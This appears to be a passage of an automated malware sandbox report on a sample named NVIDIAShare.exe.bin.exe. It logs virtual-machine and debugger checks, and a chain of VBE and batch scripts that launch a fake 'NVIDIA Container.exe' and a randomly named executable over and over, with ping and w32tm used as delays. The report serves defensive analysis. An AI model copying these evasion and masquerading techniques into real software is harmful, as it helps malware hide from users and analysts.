                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0100A69B
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0102B348 FindFirstFileExA,0_2_0102B348
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0101C220
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101E6A3 VirtualQuery,GetSystemInfo,0_2_0101E6A3
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: wscript.exe, 00000002.00000003.2077926950.0000000002F97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BD63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                                  Source: NVIDIAShare.exe.bin.exe, 00000000.00000003.2043014739.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2588332013.000000001AEDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: w32tm.exe, 00000019.00000002.2332217079.0000020462C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.3016384197.000000001B275000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_@
                                  Source: NVIDIAShare.exe.bin.exe, 00000000.00000003.2043708534.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2505625184.000000001B078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                                  Source: w32tm.exe, 00000033.00000002.2819927013.000001E784619000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                                  Source: NVIDIA Container.exe, 00000005.00000002.2122064011.000000001C728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2161092207.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000D.00000002.2162527839.0000021044348000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2281901229.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2378553906.000000001AE50000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000024.00000002.2530564345.0000025014BF7000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2557499161.0000000000828000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2723949937.000000001BCA0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002E.00000002.2738531350.0000023A7776B000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2802934915.000000001B430000.00000004.00000020.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2892138201.000000001B54F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-24032
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0101F838
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01027DEE mov eax, dword ptr fs:[00000030h]0_2_01027DEE
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0102C030 GetProcessHeap,0_2_0102C030
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101F9D5 SetUnhandledExceptionFilter,0_2_0101F9D5
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0101F838
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0101FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0101FBCA
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01028EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01028EBD
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeMemory allocated: page read and write | page guardJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01010723 cpuid 0_2_01010723
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0101AF0F
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeQueries volume information: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeQueries volume information: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe VolumeInformation
